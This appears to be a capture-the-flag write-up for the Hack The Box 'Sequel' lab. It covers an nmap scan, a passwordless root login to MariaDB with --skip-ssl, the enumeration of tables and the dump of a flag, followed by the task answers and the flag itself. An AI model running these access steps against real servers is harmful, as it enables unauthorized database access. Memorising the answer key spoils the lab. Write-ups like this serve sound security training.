Sequel
- Difficulty: Very easy
🔎 Solution
With the target IP in hand I ran a full-port, fast service/version scan to discover any database services:
> nmap -p- -sV -sC --min-rate 5000 10.129.2.30
PORT STATE SERVICE VERSION
3306/tcp open mysql?
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 66
| Capabilities flags: 63486
| Some Capabilities: ConnectWithDatabase, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, InteractiveClient, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, LongColumnFlag, SupportsTransactions, IgnoreSigpipes, Speaks41ProtocolNew, FoundRows, ODBCClient, SupportsCompression, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: *1WE2h8{&Fp"RWA}uS}<
|_ Auth Plugin Name: mysql_native_password
The scan identified a database service on port 3306 and the banner indicates MariaDB 10.3.27 (reported as 5.5.5-10.3.27-MariaDB).
In CTF/lab scenarios it's common to find misconfigured MySQL/MariaDB instances where administrative accounts have weak or empty passwords.
I attempted to connect as root with a simple client command but received an SSL/TLS-related error:
> mysql -h 10.129.2.30 -u root
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
The client was insisting on TLS while the server didn't support it;
adding --skip-ssl to the client command bypasses that client-side requirement and allowed me to connect as root without a password:
> mysql -h 10.129.2.30 -u root --skip-ssl
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 75
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
Once in the MariaDB monitor I listed the available databases (remembering to terminate SQL statements with ;):
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.273 sec)
There were four databases; three (information_schema, mysql, performance_schema) are system databases created by MySQL/MariaDB, while htb is a user-created database so I switched to it:
MariaDB [(none)]> USE htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
I enumerated the tables in htb and found config and users.
A full table dump with SELECT * FROM <table_name>; on config returned a row containing the flag:
MariaDB [htb]> SELECT * FROM config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.270 sec)
✏️ Task answers
Task 1: During our scan, which port do we find serving MySQL?
3306
Task 2: What community-developed MySQL version is the target running?
MariaDB
Task 3: When using the MySQL command line client, what switch do we need to use in order to specify a login username?
-u
Task 4: Which username allows us to log into this MariaDB instance without providing a password?
root
Task 5: In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
*
Task 6: In SQL, what symbol do we need to end each query with?
;
Task 7: There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?
htb
🚩Flag
7b4bec00d1a39e3dd4e021ec3d915da8